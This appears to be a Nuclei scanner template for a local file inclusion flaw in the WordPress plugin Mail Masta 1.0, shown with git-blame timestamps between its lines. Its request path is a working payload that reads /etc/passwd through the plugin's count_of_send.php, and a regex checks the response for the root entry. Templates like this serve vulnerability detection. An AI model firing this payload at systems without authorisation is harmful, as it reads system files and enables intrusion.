2021-05-27 03:28:03 +00:00
|
|
|
id: wp-mail-masta-lfi
|
2021-05-27 03:15:53 +00:00
|
|
|
|
|
|
|
info:
|
2021-05-27 03:28:03 +00:00
|
|
|
name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
|
2021-05-27 03:15:53 +00:00
|
|
|
author: 0x240x23elu
|
|
|
|
severity: high
|
2021-05-27 03:28:03 +00:00
|
|
|
reference: https://www.exploit-db.com/exploits/40290
|
2021-05-27 03:15:53 +00:00
|
|
|
tags: wordpress,wp-plugin,lfi
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-05-27 03:28:03 +00:00
|
|
|
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
|
2021-05-27 03:15:53 +00:00
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0:"
|
|
|
|
part: body
|